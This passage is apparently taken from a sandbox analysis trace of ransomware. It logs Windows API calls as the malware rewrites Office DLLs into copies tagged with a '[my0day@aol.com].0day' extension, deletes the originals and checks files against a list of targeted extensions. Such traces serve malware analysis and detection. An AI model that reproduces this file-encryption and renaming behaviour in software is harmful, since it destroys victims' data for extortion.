shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.803] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.803] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0056.804] GetLastError () returned 0x0 [0056.804] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0xa388, lpOverlapped=0x0) returned 1 [0056.879] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xa390, lpOverlapped=0x0) returned 1 [0056.881] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.881] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.881] SetEndOfFile (hFile=0x214) returned 1 [0056.881] CloseHandle (hObject=0x214) returned 1 [0056.881] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.881] SetEndOfFile (hFile=0x234) returned 1 [0056.882] CloseHandle (hObject=0x234) returned 1 [0056.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.883] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 1 [0056.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.883] lstrlenW (lpString=".doc") returned 4 [0056.883] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString=".docx") returned 5 [0056.883] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0056.883] lstrlenW (lpString=".pdf") returned 4 [0056.883] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString=".xls") returned 4 [0056.883] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString=".xlsx") returned 5 [0056.883] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0056.883] lstrlenW (lpString=".ppt") returned 4 [0056.883] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.883] lstrlenW (lpString=".zip") returned 4 [0056.883] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString=".rar") returned 4 [0056.883] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.883] lstrlenW (lpString=".bz2") returned 4 [0056.883] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.883] lstrlenW (lpString=".7z") returned 3 [0056.883] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.883] lstrlenW (lpString=".dbf") returned 4 [0056.884] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.884] lstrlenW (lpString=".1cd") returned 4 [0056.884] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.884] lstrlenW (lpString=".jpg") returned 4 [0056.884] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.884] lstrlenW (lpString=".doc") returned 4 [0056.884] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString=".docx") returned 5 [0056.884] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1 [0056.884] lstrlenW (lpString=".pdf") returned 4 [0056.884] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString=".xls") returned 4 [0056.884] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString=".xlsx") returned 5 [0056.884] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1 [0056.884] lstrlenW (lpString=".ppt") returned 4 [0056.884] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.884] lstrlenW (lpString=".zip") returned 4 [0056.884] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString=".rar") returned 4 [0056.884] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.884] lstrlenW (lpString=".bz2") returned 4 [0056.884] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.884] lstrlenW (lpString=".7z") returned 3 [0056.884] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.885] lstrlenW (lpString=".dbf") returned 4 [0056.885] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.885] lstrlenW (lpString=".1cd") returned 4 [0056.885] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.885] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73 [0056.885] lstrlenW (lpString=".jpg") returned 4 [0056.885] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.885] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.885] lstrlenW (lpString="OARPMANR.DLL") returned 12 [0056.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.885] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=11656) returned 1 [0056.885] CloseHandle (hObject=0x234) returned 1 [0056.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 0x20 [0056.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.886] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.886] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0057.541] GetLastError () returned 0x0 [0057.541] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x2d88, lpOverlapped=0x0) returned 1 [0057.561] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x2d90, lpOverlapped=0x0) returned 1 [0057.562] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.562] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.562] SetEndOfFile (hFile=0x1fc) returned 1 [0057.563] CloseHandle (hObject=0x1fc) returned 1 [0057.563] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.563] SetEndOfFile (hFile=0x234) returned 1 [0057.564] CloseHandle (hObject=0x234) returned 1 [0057.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.564] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 1 [0057.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.564] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.564] lstrlenW (lpString=".doc") returned 4 [0057.564] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.564] lstrlenW (lpString=".docx") returned 5 [0057.564] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.564] lstrlenW (lpString=".pdf") returned 4 [0057.564] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.564] lstrlenW (lpString=".xls") returned 4 [0057.564] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.564] lstrlenW (lpString=".xlsx") returned 5 [0057.564] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.564] lstrlenW (lpString=".ppt") returned 4 [0057.565] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString=".zip") returned 4 [0057.565] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString=".rar") returned 4 [0057.565] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString=".bz2") returned 4 [0057.565] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.565] lstrlenW (lpString=".7z") returned 3 [0057.565] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString=".dbf") returned 4 [0057.565] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString=".1cd") returned 4 [0057.565] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString=".jpg") returned 4 [0057.565] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.565] lstrlenW (lpString=".doc") returned 4 [0057.565] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString=".docx") returned 5 [0057.565] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0057.565] lstrlenW (lpString=".pdf") returned 4 [0057.565] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString=".xls") returned 4 [0057.565] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.565] lstrlenW (lpString=".xlsx") returned 5 [0057.565] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0057.565] lstrlenW (lpString=".ppt") returned 4 [0057.565] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.566] lstrlenW (lpString=".zip") returned 4 [0057.566] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.566] lstrlenW (lpString=".rar") returned 4 [0057.566] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.566] lstrlenW (lpString=".bz2") returned 4 [0057.566] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.566] lstrlenW (lpString=".7z") returned 3 [0057.566] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.566] lstrlenW (lpString=".dbf") returned 4 [0057.566] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.566] lstrlenW (lpString=".1cd") returned 4 [0057.566] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0057.566] lstrlenW (lpString=".jpg") returned 4 [0057.566] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.566] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0057.566] lstrlenW (lpString="xlsrvintl.dll") returned 13 [0057.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0057.569] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=105344) returned 1 [0057.569] CloseHandle (hObject=0x234) returned 1 [0057.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 0x20 [0057.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0057.570] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.570] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0057.570] GetLastError () returned 0x0 [0057.570] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x19b80, lpOverlapped=0x0) returned 1 [0057.629] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x19b90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x19b90, lpOverlapped=0x0) returned 1 [0057.779] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.779] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xee, lpOverlapped=0x0) returned 1 [0057.779] SetEndOfFile (hFile=0x1fc) returned 1 [0057.779] CloseHandle (hObject=0x1fc) returned 1 [0057.780] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.780] SetEndOfFile (hFile=0x234) returned 1 [0057.781] CloseHandle (hObject=0x234) returned 1 [0057.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.781] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString=".doc") returned 4 [0057.782] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString=".docx") returned 5 [0057.782] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0057.782] lstrlenW (lpString=".pdf") returned 4 [0057.782] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString=".xls") returned 4 [0057.782] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString=".xlsx") returned 5 [0057.782] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0057.782] lstrlenW (lpString=".ppt") returned 4 [0057.782] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString=".zip") returned 4 [0057.782] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString=".rar") returned 4 [0057.782] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString=".bz2") returned 4 [0057.782] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.782] lstrlenW (lpString=".7z") returned 3 [0057.782] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString=".dbf") returned 4 [0057.782] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString=".1cd") returned 4 [0057.782] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.782] lstrlenW (lpString=".jpg") returned 4 [0057.782] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString=".doc") returned 4 [0057.783] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString=".docx") returned 5 [0057.783] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0057.783] lstrlenW (lpString=".pdf") returned 4 [0057.783] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString=".xls") returned 4 [0057.783] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString=".xlsx") returned 5 [0057.783] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0057.783] lstrlenW (lpString=".ppt") returned 4 [0057.783] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString=".zip") returned 4 [0057.783] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString=".rar") returned 4 [0057.783] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0057.783] lstrlenW (lpString=".bz2") returned 4 [0057.783] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0057.783] lstrlenW (lpString=".7z") returned 3 [0057.783] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0057.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString=".dbf") returned 4 [0057.783] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0057.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString=".1cd") returned 4 [0057.783] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0057.783] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0057.783] lstrlenW (lpString=".jpg") returned 4 [0057.783] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0057.784] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0057.784] lstrlenW (lpString="ACEES.DLL") returned 9 [0057.784] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0057.836] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1012648) returned 1 [0057.836] CloseHandle (hObject=0x234) returned 1 [0057.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll")) returned 0x20 [0057.837] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0057.837] 